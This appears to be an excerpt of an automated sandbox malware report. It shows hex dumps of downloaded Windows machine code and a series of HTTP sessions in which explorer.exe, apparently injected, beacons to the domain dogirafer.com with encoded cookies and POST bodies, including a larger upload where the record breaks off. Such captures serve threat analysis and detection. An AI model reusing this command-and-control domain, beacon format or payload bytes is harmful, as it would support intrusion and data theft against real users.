                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii:
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d 05 23 46 0c 00
                                                                                                                                Data Ascii: f9LT uHL$ 3H8H\$H|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH#F
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 48 fe ff ff 48 81 ec 90 02 00 00 48 8d 05 5f 45 0c 00 c7 44 24 20 3b 64 d2 03 48 89 44 24 28 48 8d 74 24 28 48 8d 05 4e 45 0c 00 c7 44 24 30 7f 27 64 e7 45 33 e4 48 89 44 24 38 45 8b f4 4c 8d 2d f4 bf 0a 00 e8 23 fa ff ff e8 1e fa ff ff 48 89 85 c0 01 00 00 48 85 c0 0f 84 e5 00 00 00 41 8b fc ff c7 66 45 39 64 7d 00 75 f6 41 8b dc 66 44 39 20 74 09 ff c3 66 44 39 24 58 75 f7 8d 14 3b 8d 14 55 02 00 00 00 48 8d 8d c0 01 00 00 e8 1d 0d 00 00 85 c0 0f 84 a8 00 00 00 4c 8b bd c0 01 00 00 8b c3 49 8d 0c 47 03 ff 74 17 49 8b d5 44 8b c7 48 2b d1 8a 04 0a 88 01 48 ff c1 49 83 e8 01 75 f2 33 d2 48 8d 4c 24 40 41 b8 50 02 00 00 49 8b dc e8 c8 59 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 44 39 64 24 6c 74 0a ff c2
                                                                                                                                Data Ascii: HHH_ED$ ;dHD$(Ht$(HNED$0'dE3HD$8EL-#HHAfE9d}uAfD9 tfD9$Xu;UHLIGtIDH+HIu3HL$@APIYHT$@IJDHHtJ&AfD9d$lt
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 1b c3 53 2b 48 89 95 e0 01 00 00 c7 85 f0 01 00 00 f2 cb 55 df 48 89 95 f8 01 00 00 c7 85 08 02 00 00 4a 47 2d d5 48 89 95 10 02 00 00 c7 85 20 02 00 00 57 12 a2 8a 48 89 95 28 02 00 00 c7 85 38 02 00 00 39 1e f1 72 48 89 95 40 02 00 00 c7 85 50 02 00 00 21 d0 52 45 48 89 95 58 02 00 00 c7 85 68 02 00 00 7a 8e 25 e9 48 89 95 70 02 00 00 c7 85 80 02 00 00 a4 1a 86 d0 48 89 95 88 02 00 00 c7 85 98 02 00 00 14 31 8b 23 48 89 95 a0 02 00 00 c7 85 b0 02 00 00 07 77 19 f5 48 89 95 b8 02 00 00 c7 85 c8 02 00 00 4d 11 46 05 48 89 95 d0 02 00 00 c7 85 e0 02 00 00 02 91 78 2d 48 8d 05 d2 3d 0c 00 48 89 95 e8 02 00 00 48 89 85 f0 02 00 00 48 8d 0d 2d 3f 0c 00 48 8d 05 ae 3d 0c 00 c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48 8d 05 a6 3d 0c 00 48 89 85 20 03
                                                                                                                                Data Ascii: S+HUHJG-H WH(89rH@P!REHXhz%HpH1#HwHMFHx-H=HHH-?H='HH=H
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 14 48 89 95 48 06 00 00 c7 85 58 06 00 00 cb a6 9c f4 48 89 95 60 06 00 00 c7 85 70 06 00 00 fd 53 ca 1c 48 89 95 78 06 00 00 c7 85 88 06 00 00 8d bf 40 ab 48 89 95 90 06 00 00 c7 85 a0 06 00 00 02 91 d8 59 48 89 95 a8 06 00 00 48 8d 05 1c 3a 0c 00 c7 85 b8 06 00 00 ce d5 eb c9 48 89 85 b0 06 00 00 48 8d 5c 24 28 48 8d 05 07 3a 0c 00 48 89 95 c0 06 00 00 48 89 85 c8 06 00 00 33 ff 48 8d 05 f8 39 0c 00 c7 85 d0 06 00 00 9f 60 3f 3d 48 89 85 e0 06 00 00 48 8d 05 e8 39 0c 00 48 89 85 f8 06 00 00 48 8d 05 ea 39 0c 00 48 89 85 10 07 00 00 48 8d 05 d4 39 0c 00 48 89 85 28 07 00 00 48 89 95 d8 06 00 00 c7 85 e8 06 00 00 9a f6 2b d8 48 89 95 f0 06 00 00 c7 85 00 07 00 00 48 29 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3 81 48 89 95 20 07 00 00 48 8b 0b
                                                                                                                                Data Ascii: HHXH`pSHx@HYHH:HH\$(H:HH3H9`?=HH9HH9HH9H(H+HH)'uHH H
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: c0 0f 84 84 00 00 00 48 8b 41 18 48 39 41 10 72 22 48 03 c0 ba 0f 00 00 00 48 3b c2 48 0f 47 d0 48 81 fa c0 03 00 00 77 62 e8 78 00 00 00 83 f8 ff 74 58 49 83 c8 ff 49 ff c0 42 80 3c 06 00 75 f6 48 8b d6 48 8b cf e8 32 01 00 00 48 85 c0 75 3a 48 8b 6f 10 48 83 ca ff 48 ff c2 80 3c 16 00 75 f7 48 8b ce e8 c4 fe ff ff 48 8b 0f 48 89 04 e9 48 8b 07 48 83 3c e8 00 74 10 48 8b 47 08 4c 89 34 e8 48 ff 47 10 33 c0 eb 03 83 c8 ff 48 8b 6c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 83 39 00 48 8b f2 48 8b d9 75 1f 48 83 79 08 00 74 1f 83 c8 ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee 48 c1 e5 03 48 8b cd e8 8e 5a 08
                                                                                                                                Data Ascii: HAH9Ar"HH;HGHwbxtXIIB<uHH2Hu:HoHH<uHHHHH<tHGL4HG3Hl$0Ht$8H|$@H A^H\$Hl$Ht$WH H9HHuHytH\$0Hl$8Ht$@H _HytHtHHHZ
                                                                                                                                2024-12-17 16:57:11 UTC1369INData Raw: 80 fa 5c 75 0b 48 ff c0 48 89 01 80 38 00 74 13 48 ff 01 48 8b 01 8a 10 80 fa 22 75 df 48 ff c0 48 89 01 48 8b 11 80 3a 00 75 03 33 c0 c3 49 2b d0 49 8b c9 48 83 ea 02 e9 3c fd ff ff 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 83 fa 13 76 07 33 c0 e9 6c 01 00 00 48 8b 01 0f be 08 e8 4b 8e 08 00 33 db eb 0e 48 ff 07 48 8b 07 0f be 08 e8 39 8e 08 00 85 c0 75 ee 48 8b 17 80 3a 22 0f 84 06 01 00 00 80 3a 2d 0f 84 f3 00 00 00 80 3a 2f 7e be 80 3a 39 0f 8e e5 00 00 00 80 3a 5b 0f 84 ce 00 00 00 80 3a 66 74 5a 80 3a 6e 74 1b 80 3a 74 74 50 80 3a 7b 75 98 48 8d 56 01 48 8b cf e8 11 01 00 00 e9 fa 00 00 00 41 b8 04 00 00 00 48 8d 0d 1f 0f 0b 00 e8 da 8e 08 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e 55 08 00 48 85 c0 0f 84 c8 00 00
                                                                                                                                Data Ascii: \uHH8tHH"uHHH:u3I+IH<H\$Ht$WH HHHv3lHK3HH9uH:":-:/~:9:[:ftZ:nt:ttP:{uHVHAHHH>UH


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.649998104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:14 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:17 UTC812INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctaOJbcsob3oFZ7higDcjSL66JbECQ53Ulsc64v4rOUV%2B%2FDk%2BrdOyoq1iLkHE6vbxcP2AYo%2Fzjuzk%2FrPPZO26XAt6UfR1nfz%2FbHz73VPYC8G4vEUFtnrhRR3UmPY1Ro8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38737c9ef44388-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1627&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=1794714&cwnd=221&unsent_bytes=0&cid=71346f40787bcfd1&ts=2690&x=0"
                                                                                                                                2024-12-17 16:57:17 UTC343INData Raw: 31 35 30 0d 0a 6d 31 78 6f 4b 4d 52 46 75 46 66 30 4a 70 41 37 68 44 59 50 58 33 6e 49 69 65 74 58 71 53 66 61 47 30 46 63 68 58 6a 66 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 32 55 4a 33 35 71 38 77 4f 34 36 4b 35 50 41 59 72 45 42 67 2b 64 47 68 58 6e 59 69 7a 35 6a 36 47 65 66 41 7a 34 61 37 53 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 50 51 2f 50 6d 41 59 30 68 56 50 39 52 37 78 2b 58 4e 30 36 63 2b 63 2b 71 50 6b 2b 6a 4f 37 52 44 77 43 71 4c 59 2f 31 74 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 66
                                                                                                                                Data Ascii: 150m1xoKMRFuFf0JpA7hDYPX3nIietXqSfaG0FchXjfSXPurONKPOMWz0dOaU2UJ35q8wO46K5PAYrEBg+dGhXnYiz5j6GefAz4a7SyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvPQ/PmAY0hVP9R7x+XN06c+c+qPk+jO7RDwCqLY/1tMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMf
                                                                                                                                2024-12-17 16:57:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.649999104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:18 UTC416OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXwMtB7wWZOVXnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcAtkDLcBiGr4ixbRT8
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 360
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:18 UTC360OUTData Raw: 69 42 67 71 65 4a 34 51 37 33 72 34 63 64 31 49 32 47 63 6b 43 7a 75 67 38 35 4e 53 30 42 50 64 52 42 49 47 39 54 69 6a 5a 6a 2b 64 6f 75 74 47 54 66 67 48 33 48 77 4d 43 54 53 56 57 53 4d 64 38 58 2b 4a 34 4e 41 30 57 4d 43 59 5a 30 44 76 54 45 4b 56 46 47 4f 76 71 64 32 65 48 67 6a 39 59 4d 65 66 4e 73 31 2f 67 49 2f 75 64 36 4a 49 53 7a 73 62 54 52 58 4d 52 55 36 53 6c 54 56 45 45 62 58 38 41 69 50 48 63 53 69 6a 41 6d 6c 7a 71 51 44 62 4c 55 4f 76 4c 50 4b 62 64 64 74 6a 59 70 41 7a 69 30 6e 34 56 45 43 58 6b 36 4c 52 64 44 4c 37 65 34 6b 71 71 53 6e 79 47 61 41 6e 4a 36 35 39 78 71 57 58 67 6e 38 58 7a 70 36 4a 56 73 2f 79 72 66 64 2b 69 69 72 74 49 49 43 6b 41 70 33 46 63 35 39 58 6a 76 46 72 45 77 51 58 67 53 69 62 63 41 35 4c 62 37 47 51 37 38 48
                                                                                                                                Data Ascii: iBgqeJ4Q73r4cd1I2GckCzug85NS0BPdRBIG9TijZj+doutGTfgH3HwMCTSVWSMd8X+J4NA0WMCYZ0DvTEKVFGOvqd2eHgj9YMefNs1/gI/ud6JISzsbTRXMRU6SlTVEEbX8AiPHcSijAmlzqQDbLUOvLPKbddtjYpAzi0n4VECXk6LRdDL7e4kqqSnyGaAnJ659xqWXgn8Xzp6JVs/yrfd+iirtIICkAp3Fc59XjvFrEwQXgSibcA5Lb7GQ78H
                                                                                                                                2024-12-17 16:57:20 UTC810INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fa%2B0l%2B6TbPVXKsa8SxcBLIiqEeVYLxB%2BWH8z1lZFqKX8ouZq%2FVPtFjPKjeqEmQ85vvN2eXqCTI4ldQoQhg3AMBolVe3PapXRgKHJk3YT6XtpCg7VtJFFD%2BE7fUZFCk8A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38739578f78ce0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1797&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1436&delivery_rate=1610590&cwnd=206&unsent_bytes=0&cid=c1a961835311b090&ts=1627&x=0"
                                                                                                                                2024-12-17 16:57:20 UTC142INData Raw: 38 38 0d 0a 6c 31 31 72 4b 4d 74 50 76 31 66 78 4a 35 55 31 67 44 56 44 47 33 33 4a 69 65 78 54 71 6b 43 7a 47 45 68 58 67 6e 66 66 41 77 4c 70 35 5a 6f 33 54 59 52 30 72 7a 38 63 55 45 69 51 49 58 39 72 2f 55 72 65 36 61 5a 48 41 59 44 43 59 55 61 53 48 52 6a 6c 59 69 69 77 33 5a 36 63 65 77 6a 34 62 37 75 52 64 63 73 4f 32 75 47 32 47 65 30 7a 45 57 38 52 4e 6b 2b 77 64 67 7a 50 77 6c 4e 48 62 75 6a 35 52 56 6b 3d 0d 0a
                                                                                                                                Data Ascii: 88l11rKMtPv1fxJ5U1gDVDG33JiexTqkCzGEhXgnffAwLp5Zo3TYR0rz8cUEiQIX9r/Ure6aZHAYDCYUaSHRjlYiiw3Z6cewj4b7uRdcsO2uG2Ge0zEW8RNk+wdgzPwlNHbuj5RVk=
                                                                                                                                2024-12-17 16:57:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.650000104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:21 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXzMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:23 UTC806INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WBUCsioDDQlpIugY3TPEvT0cmWXadu7BhcPFLj0tz4O%2BY%2BjE%2FL8OJxCx8G1br2lAkh8A03VTmkXDuD4Bl8skZCHYILfBQDxI9vMc9Ad1SWOYfk5InVwNsTR%2BaXmCsIVY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873a92c514388-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=8&recv=9&lost=0&retrans=1&sent_bytes=4200&recv_bytes=1052&delivery_rate=43591&cwnd=221&unsent_bytes=0&cid=4eae1456fc015c0f&ts=1735&x=0"
                                                                                                                                2024-12-17 16:57:23 UTC347INData Raw: 31 35 34 0d 0a 6d 46 6c 74 4a 63 70 4d 75 6c 66 77 49 70 4d 7a 67 44 52 43 47 33 6e 4b 68 4f 4a 51 72 55 71 7a 46 55 52 58 67 48 48 65 42 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 54 4a 58 46 70 38 77 54 57 6a 36 74 41 42 34 44 45 43 55 76 5a 47 52 54 6e 61 79 6a 36 34 4d 75 51 65 77 76 2f 61 37 4c 32 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 50 4c 74 41 34 45 6d 50 4a 56 56 36 68 4b 55 4d 30 7a 52 74 73 75 73 50 45 69 69 50 64 6f 74 78 53 6d 4a 59 76 39 74 65 4c 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mFltJcpMulfwIpMzgDRCG3nKhOJQrUqzFURXgHHeBwLp5exDOPARyFkPbnOTJXFp8wTWj6tAB4DECUvZGRTnayj64MuQewv/a7L2Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TPLtA4EmPJVV6hKUM0zRtsusPEiiPdotxSmJYv9teLBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:57:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.650001104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:24 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXyMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:26 UTC809INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RErVlxuVNt7Aq7T2p2aHAgwdrqe2k1Wu5v%2BXDAbee4KDDSvnL0Do7J5LTy4VPeWZwVB5pYJJhvu06EMKJkrhvkxM%2BR5BY3zGq5k3CoOhh8gtST6bW4h8i%2FAdbWNJS43L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873bcadc98ce0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=58944&min_rtt=2183&rtt_var=34506&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1337608&cwnd=206&unsent_bytes=0&cid=a1b50ee34a0c8de7&ts=1647&x=0"
                                                                                                                                2024-12-17 16:57:26 UTC347INData Raw: 31 35 34 0d 0a 6d 46 68 75 49 4d 4a 50 76 31 66 32 4c 4a 41 78 68 6a 74 4b 47 33 37 4b 67 65 74 52 71 6b 6d 7a 48 30 68 64 67 48 50 56 41 51 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 56 4c 6e 31 74 38 77 50 57 6a 36 70 42 41 6f 4c 42 42 30 76 5a 47 78 48 72 59 69 72 2f 35 38 75 51 66 51 33 31 62 72 50 36 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 50 76 6a 44 6f 51 6f 50 35 56 54 34 52 47 51 4e 55 33 51 74 73 2b 76 4f 30 4b 6c 4d 39 30 74 78 69 71 46 61 2f 68 6d 66 37 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mFhuIMJPv1f2LJAxhjtKG37KgetRqkmzH0hdgHPVAQLp5exDOPARyFkPbnOVLn1t8wPWj6pBAoLBB0vZGxHrYir/58uQfQ31brP6Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TPvjDoQoP5VT4RGQNU3Qts+vO0KlM90txiqFa/hmf7BDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:57:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.650002104.21.16.14434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:27 UTC418OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX9MtB7wWZOVG6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 12248
                                                                                                                                Cache-Control: no-cache
